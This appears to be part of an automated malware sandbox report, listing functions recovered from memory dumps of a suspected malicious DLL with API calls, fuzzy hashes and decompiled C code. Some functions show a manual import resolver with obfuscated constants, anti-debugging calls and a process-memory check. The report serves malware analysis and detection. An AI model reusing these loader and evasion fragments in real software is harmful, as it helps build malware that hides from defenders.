Function 6E1911D0, Relevance: 61.8, APIs: 41, Instructions: 290libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(6E20A358), ref: 6E1911D9
GetProcAddress.KERNEL32(?,6E20A374), ref: 6E1911EB
GetProcAddress.KERNEL32(?,6E20A380), ref: 6E191208
GetProcAddress.KERNEL32(?,6E20A388), ref: 6E191225
GetProcAddress.KERNEL32(?,6E20A394), ref: 6E191241
GetProcAddress.KERNEL32(?,6E20A3A0), ref: 6E19125E
GetProcAddress.KERNEL32(?,6E20A3BC), ref: 6E19127B
GetProcAddress.KERNEL32(?,6E20A3D0), ref: 6E191298
GetProcAddress.KERNEL32(?,6E20A3E0), ref: 6E1912B5
GetProcAddress.KERNEL32(?,6E20A3F4), ref: 6E1912D2
GetProcAddress.KERNEL32(?,6E20A408), ref: 6E1912EF
GetProcAddress.KERNEL32(?,6E20A420), ref: 6E19130C
GetProcAddress.KERNEL32(?,6E20A434), ref: 6E191329
GetProcAddress.KERNEL32(?,6E20A454), ref: 6E191346
GetProcAddress.KERNEL32(?,6E20A46C), ref: 6E191363
GetProcAddress.KERNEL32(?,6E20A484), ref: 6E191380
GetProcAddress.KERNEL32(?,6E20A498), ref: 6E19139D
GetProcAddress.KERNEL32(?,6E20A4AC), ref: 6E1913BA
GetProcAddress.KERNEL32(?,6E20A4C8), ref: 6E1913D7
GetProcAddress.KERNEL32(?,6E20A4E8), ref: 6E1913F4
GetProcAddress.KERNEL32(?,6E20A504), ref: 6E191411
GetProcAddress.KERNEL32(?,6E20A518), ref: 6E19142E
GetProcAddress.KERNEL32(?,6E20A52C), ref: 6E19144B
GetProcAddress.KERNEL32(?,6E20A53C), ref: 6E191468
GetProcAddress.KERNEL32(?,6E20A55C), ref: 6E191485
GetProcAddress.KERNEL32(?,6E20A578), ref: 6E1914A2
GetProcAddress.KERNEL32(?,6E20A598), ref: 6E1914BF
GetProcAddress.KERNEL32(?,6E20A5B4), ref: 6E1914DC
GetProcAddress.KERNEL32(?,6E20A5CC), ref: 6E1914F9
GetProcAddress.KERNEL32(?,6E20A5E8), ref: 6E191516
GetProcAddress.KERNEL32(?,6E20A604), ref: 6E191533
GetProcAddress.KERNEL32(?,6E20A618), ref: 6E191550
GetProcAddress.KERNEL32(?,6E20A630), ref: 6E19156D
GetProcAddress.KERNEL32(?,6E20A64C), ref: 6E19158A
GetProcAddress.KERNEL32(?,6E20A664), ref: 6E1915A7
GetProcAddress.KERNEL32(?,6E20A680), ref: 6E1915C4
GetProcAddress.KERNEL32(?,6E20A698), ref: 6E1915E1
GetProcAddress.KERNEL32(?,6E20A6B0), ref: 6E1915FE
GetProcAddress.KERNEL32(?,6E20A6C4), ref: 6E19161B
GetProcAddress.KERNEL32(?,6E20A6D4), ref: 6E191638
GetProcAddress.KERNEL32(?,6E20A6E4), ref: 6E191655

Memory Dump Source

Source File: 00000000.00000002.590837995.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: AddressProc$HandleModule
String ID:
API String ID: 667068680-0
Opcode ID: 15bebab6df022e502455faf99efa3eea67bfa438f3c0286c0bc25254aa478a21
Instruction ID: d36be3b29bc17e8781f40d520df5bd63e067875e36e9953757856ca7266a54ea
Opcode Fuzzy Hash: 15bebab6df022e502455faf99efa3eea67bfa438f3c0286c0bc25254aa478a21
Instruction Fuzzy Hash: 33C131B5A00104EFDB19DBA4C598E6DBBB6FB45300F908569EA22DF784DF348E40DB90

Uniqueness

Uniqueness Score: -1.00%

Function 6E1D0480, Relevance: 58.4, APIs: 32, Strings: 1, Instructions: 600COMMON

Download Yara Rule

APIs

__invoke_watson_if_error.LIBCMTD ref: 6E1D0597
OutputDebugStringW.KERNEL32(6E21B518), ref: 6E1D05A4
OutputDebugStringW.KERNEL32(6E21B564), ref: 6E1D05CC
OutputDebugStringW.KERNEL32(6E21B584), ref: 6E1D05D7
OutputDebugStringW.KERNEL32(?), ref: 6E1D05E4
OutputDebugStringW.KERNEL32(6E21B594), ref: 6E1D05EF
__aligned_msize.LIBCMTD ref: 6E1D06E2
__invoke_watson_if_error.LIBCMTD ref: 6E1D06EB
__aligned_msize.LIBCMTD ref: 6E1D073E
__invoke_watson_if_error.LIBCMTD ref: 6E1D0747
__aligned_msize.LIBCMTD ref: 6E1D0778
__invoke_watson_if_error.LIBCMTD ref: 6E1D0781
__aligned_msize.LIBCMTD ref: 6E1D07C5
__invoke_watson_if_error.LIBCMTD ref: 6E1D07CE
__aligned_msize.LIBCMTD ref: 6E1D07FD
__invoke_watson_if_error.LIBCMTD ref: 6E1D0806
__aligned_msize.LIBCMTD ref: 6E1D08DD
__invoke_watson_if_error.LIBCMTD ref: 6E1D08E6
__aligned_msize.LIBCMTD ref: 6E1D0919
__invoke_watson_if_error.LIBCMTD ref: 6E1D0922
__cftoe.LIBCMTD ref: 6E1D095B
__aligned_msize.LIBCMTD ref: 6E1D09A2
__invoke_watson_if_error.LIBCMTD ref: 6E1D09AB

Strings

P, xrefs: 6E1D0C72

Memory Dump Source

Source File: 00000000.00000002.590837995.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: __invoke_watson_if_error$__aligned_msize$DebugOutputString$__cftoe
String ID: P
API String ID: 1550706228-3110715001
Opcode ID: cc19e8fd4d2afe760804690ae3afcfd5bb49dd24422b0cfdfed76e28210b1706
Instruction ID: 8255f1e209090ba1f15fe3a5623754306fb90cc6fef2eca0682ef0889aac0eb2
Opcode Fuzzy Hash: cc19e8fd4d2afe760804690ae3afcfd5bb49dd24422b0cfdfed76e28210b1706
Instruction Fuzzy Hash: E932B575940618EFEB60CF94CC44FDE73BABB14345F008594E6596A280EB709BC8EFA1

Uniqueness

Uniqueness Score: -1.00%

Function 6E161CDD, Relevance: 6.0, APIs: 4, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E161CDD() {
				void* _t1;
				unsigned int _t3;
				void* _t4;
				long _t5;
				void* _t6;
				intOrPtr _t10;
				void* _t14;

				_t10 =  *0x6e164130;
				_t1 = CreateEventA(0, 1, 0, 0);
				 *0x6e16413c = _t1;
				if(_t1 == 0) {
					return GetLastError();
				}
				_t3 = GetVersion();
				if(_t3 != 5) {
					L4:
					if(_t14 <= 0) {
						_t4 = 0x32;
						return _t4;
					} else {
						goto L5;
					}
				} else {
					if(_t3 >> 8 > 0) {
						L5:
						 *0x6e16412c = _t3;
						_t5 = GetCurrentProcessId();
						 *0x6e164128 = _t5;
						 *0x6e164130 = _t10;
						_t6 = OpenProcess(0x10047a, 0, _t5);
						 *0x6e164124 = _t6;
						if(_t6 == 0) {
							 *0x6e164124 =  *0x6e164124 | 0xffffffff;
						}
						return 0;
					} else {
						_t14 = _t3 - _t3;
						goto L4;
					}
				}
			}

0x6e161cde
0x6e161cec
0x6e161cf2
0x6e161cf9
0x6e161d50
0x6e161d50
0x6e161cfb
0x6e161d03
0x6e161d10
0x6e161d10
0x6e161d4c
0x6e161d4e
0x00000000
0x00000000
0x00000000
0x6e161d05
0x6e161d0c
0x6e161d12
0x6e161d12
0x6e161d17
0x6e161d25
0x6e161d2a
0x6e161d30
0x6e161d36
0x6e161d3d
0x6e161d3f
0x6e161d3f
0x6e161d49
0x6e161d0e
0x6e161d0e
0x00000000
0x6e161d0e
0x6e161d0c

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,6E161243,747863F0), ref: 6E161CEC
GetVersion.KERNEL32 ref: 6E161CFB
GetCurrentProcessId.KERNEL32 ref: 6E161D17
OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 6E161D30

Memory Dump Source

Source File: 00000000.00000002.590714125.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000000.00000002.590570797.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.590742972.000000006E163000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.590764017.000000006E165000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.590805088.000000006E166000.00000002.00020000.sdmp Download File

Similarity

API ID: Process$CreateCurrentEventOpenVersion
String ID:
API String ID: 845504543-0
Opcode ID: 2f86b238b041ebd2d9ff746eda89a166c1bad3e838c8e686dd98db39f4fdf0cb
Instruction ID: 47aa81a20c76338c8d46dec483c201387ddc0319f4d9c518c2e8ba316dee30ad
Opcode Fuzzy Hash: 2f86b238b041ebd2d9ff746eda89a166c1bad3e838c8e686dd98db39f4fdf0cb
Instruction Fuzzy Hash: 43F08C70694B119BEFC15BB8A82D7A93BB0B757722F20C115E685CA1C4D370A08BBB08

Uniqueness

Uniqueness Score: -1.00%

Function 6E1D5AB0, Relevance: 4.7, APIs: 3, Instructions: 223filetimeCOMMON

Download Yara Rule

APIs

FindFirstFileExW.KERNEL32(00000000,00000000,?), ref: 6E1D5BC1
std::_Timevec::_Timevec.LIBCPMTD ref: 6E1D5BCE
FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 6E1D5D63

Memory Dump Source

Source File: 00000000.00000002.590837995.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: FileFind$FirstNextTimevecTimevec::_std::_
String ID:
API String ID: 2141543823-0
Opcode ID: 7132165d03e86acd78bddb4512120ffabf7f61fd365ee0e3162c09a74b6e9ce4
Instruction ID: 160ff31ca8eb4910fb0e86e0e91c58d433a04fcd41e4b68d4c42defc6eeb4688
Opcode Fuzzy Hash: 7132165d03e86acd78bddb4512120ffabf7f61fd365ee0e3162c09a74b6e9ce4
Instruction Fuzzy Hash: BCA16C719142689BCB64DFA4CC98BEEB779EF91305F5045D8D4096B290DB30AEC8DF90

Uniqueness

Uniqueness Score: -1.00%

Function 6E1A4F60, Relevance: 4.6, APIs: 3, Instructions: 81COMMON

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 6E1A5060
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6E1A506E
UnhandledExceptionFilter.KERNEL32(?), ref: 6E1A507B

Memory Dump Source

Source File: 00000000.00000002.590837995.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: da53dd172ba40b49fba10a5d85dd5371ffb06db2709cffa41ec119b9df977a42
Instruction ID: 312b8cd283d4b2dc114eba5422d23cb1489fcb8b5876b6844ba23b49cc43b137
Opcode Fuzzy Hash: da53dd172ba40b49fba10a5d85dd5371ffb06db2709cffa41ec119b9df977a42
Instruction Fuzzy Hash: 2F41F5B4C1122CABCB24DF64D988BDDB7B8AF18314F5082D9E90D66240E7305B85DF85

Uniqueness

Uniqueness Score: -1.00%

Function 6E1617FA, Relevance: 3.1, APIs: 2, Instructions: 92
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E1617FA(void* __edi, intOrPtr _a4) {
				signed int _v8;
				intOrPtr* _v12;
				_Unknown_base(*)()** _v16;
				signed int _v20;
				signed short _v24;
				struct HINSTANCE__* _v28;
				intOrPtr _t43;
				intOrPtr* _t45;
				intOrPtr _t46;
				struct HINSTANCE__* _t47;
				intOrPtr* _t49;
				intOrPtr _t50;
				signed short _t51;
				_Unknown_base(*)()* _t53;
				CHAR* _t54;
				_Unknown_base(*)()* _t55;
				void* _t58;
				signed int _t59;
				_Unknown_base(*)()* _t60;
				intOrPtr _t61;
				intOrPtr _t65;
				signed int _t68;
				void* _t69;
				CHAR* _t71;
				signed short* _t73;

				_t69 = __edi;
				_v20 = _v20 & 0x00000000;
				_t59 =  *0x6e164140;
				_t43 =  *((intOrPtr*)(_a4 + _t59 * 8 - 0x1b4cdd98));
				if(_t43 != 0) {
					_t45 = _t43 + __edi;
					_v12 = _t45;
					_t46 =  *((intOrPtr*)(_t45 + 0xc));
					if(_t46 != 0) {
						while(1) {
							_t71 = _t46 + _t69;
							_t47 = LoadLibraryA(_t71);
							_v28 = _t47;
							if(_t47 == 0) {
								break;
							}
							_v24 = _v24 & 0x00000000;
							 *_t71 = _t59 - 0x63699bc3;
							_t49 = _v12;
							_t61 =  *((intOrPtr*)(_t49 + 0x10));
							_t50 =  *_t49;
							if(_t50 != 0) {
								L6:
								_t73 = _t50 + _t69;
								_v16 = _t61 + _t69;
								while(1) {
									_t51 =  *_t73;
									if(_t51 == 0) {
										break;
									}
									if(__eflags < 0) {
										__eflags = _t51 - _t69;
										if(_t51 < _t69) {
											L12:
											_t21 =  &_v8;
											 *_t21 = _v8 & 0x00000000;
											__eflags =  *_t21;
											_v24 =  *_t73 & 0x0000ffff;
										} else {
											_t65 = _a4;
											__eflags = _t51 -  *((intOrPtr*)(_t65 + 0x50)) + _t69;
											if(_t51 >=  *((intOrPtr*)(_t65 + 0x50)) + _t69) {
												goto L12;
											} else {
												goto L11;
											}
										}
									} else {
										_t51 = _t51 + _t69;
										L11:
										_v8 = _t51;
									}
									_t53 = _v8;
									__eflags = _t53;
									if(_t53 == 0) {
										_t54 = _v24 & 0x0000ffff;
									} else {
										_t54 = _t53 + 2;
									}
									_t55 = GetProcAddress(_v28, _t54);
									__eflags = _t55;
									if(__eflags == 0) {
										_v20 = _t59 - 0x63699b44;
									} else {
										_t68 = _v8;
										__eflags = _t68;
										if(_t68 != 0) {
											 *_t68 = _t59 - 0x63699bc3;
										}
										 *_v16 = _t55;
										_t58 = 0x725990f8 + _t59 * 4;
										_t73 = _t73 + _t58;
										_t32 =  &_v16;
										 *_t32 = _v16 + _t58;
										__eflags =  *_t32;
										continue;
									}
									goto L23;
								}
							} else {
								_t50 = _t61;
								if(_t61 != 0) {
									goto L6;
								}
							}
							L23:
							_v12 = _v12 + 0x14;
							_t46 =  *((intOrPtr*)(_v12 + 0xc));
							if(_t46 != 0) {
								continue;
							} else {
							}
							L26:
							goto L27;
						}
						_t60 = _t59 + 0x9c9664bb;
						__eflags = _t60;
						_v20 = _t60;
						goto L26;
					}
				}
				L27:
				return _v20;
			}

0x6e1617fa
0x6e161803
0x6e161808
0x6e16180e
0x6e161817
0x6e16181d
0x6e16181f
0x6e161822
0x6e161827
0x6e16182e
0x6e16182e
0x6e161832
0x6e161838
0x6e16183d
0x00000000
0x00000000
0x6e161843
0x6e16184d
0x6e16184f
0x6e161852
0x6e161855
0x6e161859
0x6e161861
0x6e161863
0x6e161866
0x6e1618ce
0x6e1618ce
0x6e1618d2
0x00000000
0x00000000
0x6e16186b
0x6e161871
0x6e161873
0x6e161886
0x6e161889
0x6e161889
0x6e161889
0x6e16188d
0x6e161875
0x6e161875
0x6e16187d
0x6e16187f
0x00000000
0x00000000
0x00000000
0x00000000
0x6e16187f
0x6e16186d
0x6e16186d
0x6e161881
0x6e161881
0x6e161881
0x6e161890
0x6e161893
0x6e161895
0x6e16189c
0x6e161897
0x6e161897
0x6e161897
0x6e1618a4
0x6e1618aa
0x6e1618ac
0x6e1618dc
0x6e1618ae
0x6e1618ae
0x6e1618b1
0x6e1618b3
0x6e1618bb
0x6e1618bb
0x6e1618c0
0x6e1618c2
0x6e1618c9
0x6e1618cb
0x6e1618cb
0x6e1618cb
0x00000000
0x6e1618cb
0x00000000
0x6e1618ac
0x6e16185b
0x6e16185b
0x6e16185f
0x00000000
0x00000000
0x6e16185f
0x6e1618df
0x6e1618df
0x6e1618e6
0x6e1618eb
0x00000000
0x00000000
0x6e1618f1
0x6e1618fc
0x00000000
0x6e1618fc
0x6e1618f3
0x6e1618f3
0x6e1618f9
0x00000000
0x6e1618f9
0x6e161827
0x6e1618fd
0x6e161902

APIs

LoadLibraryA.KERNEL32(?,?,00000000,?,?), ref: 6E161832
GetProcAddress.KERNEL32(?,00000000), ref: 6E1618A4

Memory Dump Source

Source File: 00000000.00000002.590714125.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000000.00000002.590570797.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.590742972.000000006E163000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.590764017.000000006E165000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.590805088.000000006E166000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressLibraryLoadProc
String ID:
API String ID: 2574300362-0
Opcode ID: ff5cbdf79df72bb0d5cc9897c160ab1bd472974ccee8b47161a697f11ada4666
Instruction ID: b4ebba016cabf046548c5db0b8c6a2e0e3b2372e785ef58e8a55df027b62c435
Opcode Fuzzy Hash: ff5cbdf79df72bb0d5cc9897c160ab1bd472974ccee8b47161a697f11ada4666
Instruction Fuzzy Hash: C5316D71F00206DFDB44CF9AC890AAEB7F8BF55340B2140A9D919E7240E770DAD9EB90

Uniqueness

Uniqueness Score: -1.00%

Function 6E1623A5, Relevance: 1.7, APIs: 1, Instructions: 195
nativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E1623A5(long _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				short* _v32;
				void _v36;
				void* _t57;
				signed int _t58;
				signed int _t61;
				signed int _t62;
				void* _t63;
				signed int* _t68;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr _t72;
				intOrPtr _t75;
				void* _t76;
				signed int _t77;
				void* _t78;
				void _t80;
				signed int _t81;
				signed int _t84;
				signed int _t86;
				short* _t87;
				void* _t89;
				signed int* _t90;
				long _t91;
				signed int _t93;
				signed int _t94;
				signed int _t100;
				signed int _t102;
				void* _t104;
				long _t108;
				signed int _t110;

				_t108 = _a4;
				_t76 =  *(_t108 + 8);
				if((_t76 & 0x00000003) != 0) {
					L3:
					return 0;
				}
				_a4 =  *[fs:0x4];
				_v8 =  *[fs:0x8];
				if(_t76 < _v8 || _t76 >= _a4) {
					_t102 =  *(_t108 + 0xc);
					__eflags = _t102 - 0xffffffff;
					if(_t102 != 0xffffffff) {
						_t91 = 0;
						__eflags = 0;
						_a4 = 0;
						_t57 = _t76;
						do {
							_t80 =  *_t57;
							__eflags = _t80 - 0xffffffff;
							if(_t80 == 0xffffffff) {
								goto L9;
							}
							__eflags = _t80 - _t91;
							if(_t80 >= _t91) {
								L20:
								_t63 = 0;
								L60:
								return _t63;
							}
							L9:
							__eflags =  *(_t57 + 4);
							if( *(_t57 + 4) != 0) {
								_t12 =  &_a4;
								 *_t12 = _a4 + 1;
								__eflags =  *_t12;
							}
							_t91 = _t91 + 1;
							_t57 = _t57 + 0xc;
							__eflags = _t91 - _t102;
						} while (_t91 <= _t102);
						__eflags = _a4;
						if(_a4 == 0) {
							L15:
							_t81 =  *0x6e164178;
							_t110 = _t76 & 0xfffff000;
							_t58 = 0;
							__eflags = _t81;
							if(_t81 <= 0) {
								L18:
								_t104 = _t102 | 0xffffffff;
								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
								__eflags = _t61;
								if(_t61 < 0) {
									_t62 = 0;
									__eflags = 0;
								} else {
									_t62 = _a4;
								}
								__eflags = _t62;
								if(_t62 == 0) {
									L59:
									_t63 = _t104;
									goto L60;
								} else {
									__eflags = _v12 - 0x1000000;
									if(_v12 != 0x1000000) {
										goto L59;
									}
									__eflags = _v16 & 0x000000cc;
									if((_v16 & 0x000000cc) == 0) {
										L46:
										_t63 = 1;
										 *0x6e1641c0 = 1;
										__eflags =  *0x6e1641c0;
										if( *0x6e1641c0 != 0) {
											goto L60;
										}
										_t84 =  *0x6e164178;
										__eflags = _t84;
										_t93 = _t84;
										if(_t84 <= 0) {
											L51:
											__eflags = _t93;
											if(_t93 != 0) {
												L58:
												 *0x6e1641c0 = 0;
												goto L5;
											}
											_t77 = 0xf;
											__eflags = _t84 - _t77;
											if(_t84 <= _t77) {
												_t77 = _t84;
											}
											_t94 = 0;
											__eflags = _t77;
											if(_t77 < 0) {
												L56:
												__eflags = _t84 - 0x10;
												if(_t84 < 0x10) {
													_t86 = _t84 + 1;
													__eflags = _t86;
													 *0x6e164178 = _t86;
												}
												goto L58;
											} else {
												do {
													_t68 = 0x6e164180 + _t94 * 4;
													_t94 = _t94 + 1;
													__eflags = _t94 - _t77;
													 *_t68 = _t110;
													_t110 =  *_t68;
												} while (_t94 <= _t77);
												goto L56;
											}
										}
										_t69 = 0x6e16417c + _t84 * 4;
										while(1) {
											__eflags =  *_t69 - _t110;
											if( *_t69 == _t110) {
												goto L51;
											}
											_t93 = _t93 - 1;
											_t69 = _t69 - 4;
											__eflags = _t93;
											if(_t93 > 0) {
												continue;
											}
											goto L51;
										}
										goto L51;
									}
									_t87 = _v32;
									__eflags =  *_t87 - 0x5a4d;
									if( *_t87 != 0x5a4d) {
										goto L59;
									}
									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
									__eflags =  *_t71 - 0x4550;
									if( *_t71 != 0x4550) {
										goto L59;
									}
									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
									if( *((short*)(_t71 + 0x18)) != 0x10b) {
										goto L59;
									}
									_t78 = _t76 - _t87;
									__eflags =  *((short*)(_t71 + 6));
									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
									if( *((short*)(_t71 + 6)) <= 0) {
										goto L59;
									}
									_t72 =  *((intOrPtr*)(_t89 + 0xc));
									__eflags = _t78 - _t72;
									if(_t78 < _t72) {
										goto L46;
									}
									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
										goto L46;
									}
									__eflags =  *(_t89 + 0x27) & 0x00000080;
									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
										goto L20;
									}
									goto L46;
								}
							} else {
								goto L16;
							}
							while(1) {
								L16:
								__eflags =  *((intOrPtr*)(0x6e164180 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x6e164180 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 + 1;
								__eflags = _t58 - _t81;
								if(_t58 < _t81) {
									continue;
								}
								goto L18;
							}
							__eflags = _t58;
							if(_t58 <= 0) {
								goto L5;
							}
							 *0x6e1641c0 = 1;
							__eflags =  *0x6e1641c0;
							if( *0x6e1641c0 != 0) {
								goto L5;
							}
							__eflags =  *((intOrPtr*)(0x6e164180 + _t58 * 4)) - _t110;
							if( *((intOrPtr*)(0x6e164180 + _t58 * 4)) == _t110) {
								L32:
								_t100 = 0;
								__eflags = _t58;
								if(_t58 < 0) {
									L34:
									 *0x6e1641c0 = 0;
									goto L5;
								} else {
									goto L33;
								}
								do {
									L33:
									_t90 = 0x6e164180 + _t100 * 4;
									_t100 = _t100 + 1;
									__eflags = _t100 - _t58;
									 *_t90 = _t110;
									_t110 =  *_t90;
								} while (_t100 <= _t58);
								goto L34;
							}
							_t58 = _t81 - 1;
							__eflags = _t58;
							if(_t58 < 0) {
								L28:
								__eflags = _t81 - 0x10;
								if(_t81 < 0x10) {
									_t81 = _t81 + 1;
									__eflags = _t81;
									 *0x6e164178 = _t81;
								}
								_t58 = _t81 - 1;
								goto L32;
							} else {
								goto L25;
							}
							while(1) {
								L25:
								__eflags =  *((intOrPtr*)(0x6e164180 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x6e164180 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 - 1;
								__eflags = _t58;
								if(_t58 >= 0) {
									continue;
								}
								break;
							}
							__eflags = _t58;
							if(__eflags >= 0) {
								if(__eflags == 0) {
									goto L34;
								}
								goto L32;
							}
							goto L28;
						}
						_t75 =  *((intOrPtr*)(_t108 - 8));
						__eflags = _t75 - _v8;
						if(_t75 < _v8) {
							goto L20;
						}
						__eflags = _t75 - _t108;
						if(_t75 >= _t108) {
							goto L20;
						}
						goto L15;
					}
					L5:
					_t63 = 1;
					goto L60;
				} else {
					goto L3;
				}
			}

0x6e1623af
0x6e1623b2
0x6e1623b8
0x6e1623d6
0x00000000
0x6e1623d6
0x6e1623c0
0x6e1623c9
0x6e1623cf
0x6e1623de
0x6e1623e1
0x6e1623e4
0x6e1623ee
0x6e1623ee
0x6e1623f0
0x6e1623f3
0x6e1623f5
0x6e1623f5
0x6e1623f7
0x6e1623fa
0x00000000
0x00000000
0x6e1623fc
0x6e1623fe
0x6e162464
0x6e162464
0x6e1625c2
0x00000000
0x6e1625c2
0x6e162400
0x6e162400
0x6e162404
0x6e162406
0x6e162406
0x6e162406
0x6e162406
0x6e162409
0x6e16240a
0x6e16240d
0x6e16240d
0x6e162411
0x6e162415
0x6e162423
0x6e162423
0x6e16242b
0x6e162431
0x6e162433
0x6e162435
0x6e162445
0x6e162452
0x6e162456
0x6e16245b
0x6e16245d
0x6e1624db
0x6e1624db
0x6e16245f
0x6e16245f
0x6e16245f
0x6e1624dd
0x6e1624df
0x6e1625c0
0x6e1625c0
0x00000000
0x6e1624e5
0x6e1624e5
0x6e1624ec
0x00000000
0x00000000
0x6e1624f2
0x6e1624f6
0x6e162552
0x6e162554
0x6e16255c
0x6e16255e
0x6e162560
0x00000000
0x00000000
0x6e162562
0x6e162568
0x6e16256a
0x6e16256c
0x6e162581
0x6e162581
0x6e162583
0x6e1625b2
0x6e1625b9
0x00000000
0x6e1625b9
0x6e162587
0x6e162588
0x6e16258a
0x6e16258c
0x6e16258c
0x6e16258e
0x6e162590
0x6e162592
0x6e1625a6
0x6e1625a6
0x6e1625a9
0x6e1625ab
0x6e1625ab
0x6e1625ac
0x6e1625ac
0x00000000
0x6e162594
0x6e162594
0x6e162594
0x6e16259d
0x6e16259e
0x6e1625a0
0x6e1625a2
0x6e1625a2
0x00000000
0x6e162594
0x6e162592
0x6e16256e
0x6e162575
0x6e162575
0x6e162577
0x00000000
0x00000000
0x6e162579
0x6e16257a
0x6e16257d
0x6e16257f
0x00000000
0x00000000
0x00000000
0x6e16257f
0x00000000
0x6e162575
0x6e1624f8
0x6e1624fb
0x6e162500
0x00000000
0x00000000
0x6e162509
0x6e16250b
0x6e162511
0x00000000
0x00000000
0x6e162517
0x6e16251d
0x00000000
0x00000000
0x6e162523
0x6e162525
0x6e16252e
0x6e162532
0x00000000
0x00000000
0x6e162538
0x6e16253b
0x6e16253d
0x00000000
0x00000000
0x6e162544
0x6e162546
0x00000000
0x00000000
0x6e162548
0x6e16254c
0x00000000
0x00000000
0x00000000
0x6e16254c
0x00000000
0x00000000
0x00000000
0x6e162437
0x6e162437
0x6e162437
0x6e16243e
0x00000000
0x00000000
0x6e162440
0x6e162441
0x6e162443
0x00000000
0x00000000
0x00000000
0x6e162443
0x6e16246b
0x6e16246d
0x00000000
0x00000000
0x6e16247d
0x6e16247f
0x6e162481
0x00000000
0x00000000
0x6e162487
0x6e16248e
0x6e1624ba
0x6e1624ba
0x6e1624bc
0x6e1624be
0x6e1624d2
0x6e1624d4
0x00000000
0x00000000
0x00000000
0x00000000
0x6e1624c0
0x6e1624c0
0x6e1624c0
0x6e1624c9
0x6e1624ca
0x6e1624cc
0x6e1624ce
0x6e1624ce
0x00000000
0x6e1624c0
0x6e162490
0x6e162493
0x6e162495
0x6e1624a7
0x6e1624a7
0x6e1624aa
0x6e1624ac
0x6e1624ac
0x6e1624ad
0x6e1624ad
0x6e1624b3
0x00000000
0x00000000
0x00000000
0x00000000
0x6e162497
0x6e162497
0x6e162497
0x6e16249e
0x00000000
0x00000000
0x6e1624a0
0x6e1624a0
0x6e1624a1
0x00000000
0x00000000
0x00000000
0x6e1624a1
0x6e1624a3
0x6e1624a5
0x6e1624b8
0x00000000
0x00000000
0x00000000
0x6e1624b8
0x00000000
0x6e1624a5
0x6e162417
0x6e16241a
0x6e16241d
0x00000000
0x00000000
0x6e16241f
0x6e162421
0x00000000
0x00000000
0x00000000
0x6e162421
0x6e1623e6
0x6e1623e8
0x00000000
0x00000000
0x00000000
0x00000000

APIs

NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 6E162456

Memory Dump Source

Source File: 00000000.00000002.590714125.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000000.00000002.590570797.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.590742972.000000006E163000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.590764017.000000006E165000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.590805088.000000006E166000.00000002.00020000.sdmp Download File

Similarity

API ID: MemoryQueryVirtual
String ID:
API String ID: 2850889275-0
Opcode ID: abb455f65089a427c15396e64a76f3f839b6d7153b3650b38d40b1f8115b51af
Instruction ID: e59ca87f04610c7837ab47bd4f26d42d486150b1e0e64a733d6fec3043582df1
Opcode Fuzzy Hash: abb455f65089a427c15396e64a76f3f839b6d7153b3650b38d40b1f8115b51af
Instruction Fuzzy Hash: FC61F371714606CFEB69CFA9C8B06A933B5FB66358B318529D816C7194F330D8E2EB50

Uniqueness

Uniqueness Score: -1.00%

Function 6E1938F0, Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(6E193900), ref: 6E1938F8

Memory Dump Source

Source File: 00000000.00000002.590837995.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: f781ced9b22c85ad4dd60d42a29a23e7085a61169f4ad235df252f8ed2a3657f
Instruction ID: f0d12816121fe07f8ce7ed93776772a85de1e8f5b6ed55ab0f38d7ff1ea429b6
Opcode Fuzzy Hash: f781ced9b22c85ad4dd60d42a29a23e7085a61169f4ad235df252f8ed2a3657f
Instruction Fuzzy Hash: CBA0223000820CF3082023E2B80CE8AFFBCC0022223008000F00F00B020A22200030F2

Uniqueness

Uniqueness Score: -1.00%

